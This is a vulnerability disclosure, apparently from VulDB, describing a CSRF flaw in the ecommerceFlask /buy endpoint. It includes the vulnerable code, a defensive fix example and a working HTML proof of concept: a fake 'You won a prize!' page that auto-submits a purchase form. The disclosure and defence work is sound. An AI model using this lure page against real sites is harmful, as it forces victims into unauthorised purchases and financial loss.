| Title | imhamzaazam ecommerceFlask v1.0 CSRF |
|---|---|
| Description | report body reproduced below |

# CSRF Vulnerability in Forced Purchase (/buy)
## Summary
A **Cross-Site Request Forgery (CSRF)** vulnerability exists in the purchase endpoint `/buy`. The lack of CSRF protection in both the application configuration and endpoint implementation allows attackers to force an authenticated victim to purchase a product, deducting the victim's account balance and creating an order without authorization.
## Vulnerability Details
### Configuration-Level Issue
**File**: `application.py` (Lines 24-31)
```python
# Imports added here for context; the issue quotes application.py lines 24-31 only.
from tempfile import mkdtemp
from flask import Flask
from flask_session import Session
from cs50 import SQL  # assumed: the CS50 SQL wrapper, which matches the :name parameter style used below

app = Flask(__name__)

# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# ❌ No CSRF protection mechanism configured (no Flask-WTF / CSRFProtect)
# ❌ No SESSION_COOKIE_SAMESITE configured on the session cookie
db = SQL("sqlite:///ecommDb.db")
```
Authentication relies solely on the session cookie via `helpers.py`:
```python
from functools import wraps
from flask import redirect, session


def login_required(f):
    """Redirect to /login unless the server-side session carries a user_id."""
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if session.get("user_id") is None:  # ❌ cookie-only authorization
            return redirect("/login")
        return f(*args, **kwargs)
    return decorated_function
```
### Endpoint-Level Code Analysis
**File**: `application.py` (Lines 48-72)
```python
from flask import redirect, request, session, url_for  # import added for context


@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
    if request.method == "POST":
        product = request.form.get("product")
        rows = db.execute("Select * from products where product_name= :name", name=product)
        quantity = int(request.form.get("quantity"))
        # ❌ No CSRF token validation
        # ❌ No Origin/Referer verification
        db.execute("Update users set cash = cash - :bought where id = :id",
                   bought=rows[0]["product_price"], id=session["user_id"])  # ⚠️ deducts balance
        db.execute("insert into invoice(...) values (...)")  # ⚠️ creates order (columns elided in the report)
        db.execute("Update products set product_stock = product_stock - :count where product_name=:name",
                   name=product, count=quantity)
        return redirect(url_for("index"))
```
**Security Issues**:
1. ❌ No CSRF token validation
2. ❌ No origin verification
3. ⚠️ Performs a financial state change (balance deduction + order creation) based only on the session cookie
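The two gaps listed above (no token in the configuration, no origin check in the endpoint) are the two controls a fix needs. In the application itself that is `CSRFProtect(app)` from Flask-WTF plus `app.config["SESSION_COOKIE_SAMESITE"] = "Lax"` on the session cookie. The block below is an added example, not code from the ecommerceFlask project: it shows the same checks in framework-agnostic Python so that it runs without Flask, with a guarded `buy` step that rejects the cross-site request shape used in the PoC while accepting a same-site request that carries the session token. The function names, the allowed origin `http://127.0.0.1:5000`, the in-memory `users`/`products` dicts and the sample requests are all constructed for this illustration.

```python
# Added example, not code from the ecommerceFlask project: the checks the
# /buy handler lacks (synchronizer token, Origin/Referer verification),
# written framework-agnostic so it runs without Flask. Function names, the
# allowed origin and the sample requests are constructed for this illustration.
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed deployment origin (the PoC in the report targets http://127.0.0.1:5000).
ALLOWED_ORIGINS = {"http://127.0.0.1:5000"}


def generate_csrf_token() -> str:
    """Create a per-session synchronizer token. Store it server-side in the
    session and embed it as a hidden field in the purchase form."""
    return secrets.token_urlsafe(32)


def csrf_token_valid(session: dict, form: dict) -> bool:
    """Compare the session's token with the submitted one in constant time.
    A page on another origin cannot read the victim's session, so it cannot
    build a form that carries the right value."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def origin_allowed(headers: dict, allowed: set = ALLOWED_ORIGINS) -> bool:
    """Defence in depth: accept a state-changing request only if the
    browser-set Origin header (or, when absent, the Referer's origin) is
    this site. A request carrying neither header is rejected."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if not referer:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin in allowed


def buy(session: dict, headers: dict, form: dict, users: dict, products: dict):
    """Guarded purchase step. Returns (http_status, reason). `users` and
    `products` are dicts standing in for the SQLite tables."""
    user_id = session.get("user_id")
    if user_id is None:
        return 302, "login required"
    if not origin_allowed(headers):
        return 403, "origin not allowed"
    if not csrf_token_valid(session, form):
        return 403, "missing or invalid csrf token"
    product = products.get(form.get("product"))
    if product is None:
        return 400, "unknown product"
    try:
        quantity = int(form.get("quantity", ""))
    except ValueError:
        return 400, "invalid quantity"
    if quantity < 1 or quantity > product["stock"]:
        return 400, "invalid quantity"
    cost = product["price"] * quantity  # charge per unit, unlike the vulnerable handler
    user = users[user_id]
    if user["cash"] < cost:
        return 400, "insufficient funds"
    user["cash"] -= cost
    product["stock"] -= quantity
    return 302, "ok"


def demo():
    """Replay the report's scenario with constructed data: a cross-site
    auto-submitted form versus a same-site form carrying the session token."""
    users = {1: {"cash": 10000.0}}
    products = {"widget": {"price": 100.0, "stock": 5}}
    session = {"user_id": 1, "csrf_token": generate_csrf_token()}

    # The PoC page: POST from another origin, no token in the form.
    forged = buy(session,
                 {"Origin": "http://attacker.example"},
                 {"product": "widget", "quantity": "1"},
                 users, products)

    # A checkout rendered by the site itself: same origin, token included.
    genuine = buy(session,
                  {"Origin": "http://127.0.0.1:5000"},
                  {"product": "widget", "quantity": "1",
                   "csrf_token": session["csrf_token"]},
                  users, products)
    return forged, genuine, users[1]["cash"]


if __name__ == "__main__":
    print(demo())
```

Running `demo()` returns `(403, 'origin not allowed')` for the forged request, `(302, 'ok')` for the genuine one, and a remaining balance of `9900.0`: only the same-site request with the token moves money. The origin check is deliberately placed before the token check so a forged request is refused even if a token were ever leaked, and a request with neither `Origin` nor `Referer` is treated as untrusted rather than waved through.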
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
  <title>You won a prize!</title>
</head>
<body>
  <h2>Congratulations! Claim your reward</h2>
  <p>Loading your reward...</p>
  <form id="csrf-form" action="http://127.0.0.1:5000/buy" method="POST">
    <input type="hidden" name="product" value="EXISTING_PRODUCT_NAME">
    <input type="hidden" name="quantity" value="1">
  </form>
  <script>
    setTimeout(function() {
      document.getElementById('csrf-form').submit();
    }, 1000);
  </script>
</body>
</html>
```
**Verified result** (local deployment): a cross-site, tokenless `/buy` request was accepted (HTTP 302) and the victim balance dropped from `10000.0` to `9900.0`.
## Impact
**Victim balance theft / forced purchase** - Attackers can force an authenticated user to spend their balance on an arbitrary (attacker-defined) product, causing direct financial loss and fraudulent orders.
---
**CVSS Score**: 6.5 (Medium) — `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N`
**CWE**: CWE-352 (Cross-Site Request Forgery)
---
**Reported by**: flashzyc
**Date**: 2026-06-07
| Field | Value |
|---|---|
| Source | https://github.com/imhamzaazam/ecommerceFlask/issues/1 |
| User | flashzyc (UID 92850) |
| Submission | 06/07/2026 08:11 |
| Moderation | 07/05/2026 20:36 (29 days later) |
| Status | Accepted |
| VulDB entry | 376394 [imhamzaazam ecommerceFlask up to cb7d9e24c30a99379651b7493b32048126ef402b cross-site request forgery] |
| Points | 20 |